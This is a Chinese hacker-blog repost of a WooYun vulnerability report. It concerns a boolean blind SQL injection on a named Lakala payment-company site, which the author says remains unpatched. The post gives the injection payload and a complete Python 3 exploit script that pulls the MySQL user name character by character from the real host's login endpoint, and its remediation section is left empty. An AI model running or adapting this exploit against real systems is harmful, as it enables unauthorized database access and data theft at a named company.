记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

拉卡拉某站依旧存在POST bool blind(附python 3验证脚本)

2016-04-10 18:45

最近在研究POC以及EXP的编写,学习lijiejie大牛的漏洞时,由于lijiejie的脚本都在python 2.x环境中,想在python 3学习,需要修改下代码



手动修改时,发现这个漏洞 WooYun: 拉卡拉某站点存在MySQL注射(附验证脚本) 已经公开了一年多

但是却依然没有修复,厂商还是乌云注册厂商



注入方式:POST http://jzlq.lakala.com:7070/pos/index.php?action=login

提交数据:

captcha_keystring=1&password_login=&password_login_show=&username=aa"XOR(if(length(user())=15,1,0))OR"bb



code 区域
MySQL user is [email protected] 





.png

漏洞证明:

EXP(python 3.4):



code 区域
# -*- coding:utf-8 -*-

import http.client

import time

import string

import sys

import random

import urllib.request

import urllib.parse

import urllib



headers = {'Content-Type': 'application/x-www-form-urlencoded'}

payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')



print("Start to retrive MySQL User:\n")



user = ''



for i in range(1, 16):

for payload in payloads:

sys.stdout.write('.')

sys.stdout.flush()

conn = http.client.HTTPConnection('jzlq.lakala.com:7070', timeout=3)

s = 'aa"XOR(if(ascii(mid(user()from(%s)for(1)))=%s,1,0))OR"bb' % (i, ord(payload))

conn.request(method='POST',

url='/pos/index.php?action=login',

body='aptcha_keystring=&password_login=&password_login_show=&username=' + urllib.parse.quote(s),

headers=headers)

html_doc = conn.getresponse().read().decode('utf-8')

conn.close()

if html_doc.find(u'请输入新密码') > 0:

user += payload

print('\r[In Progress]' + user)

break



print("\n[Done]MySQL user is %s" % user)



修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2016-0191820

阅读:96220 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“拉卡拉某站依旧存在POST bool blind(附python 3验证脚本)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云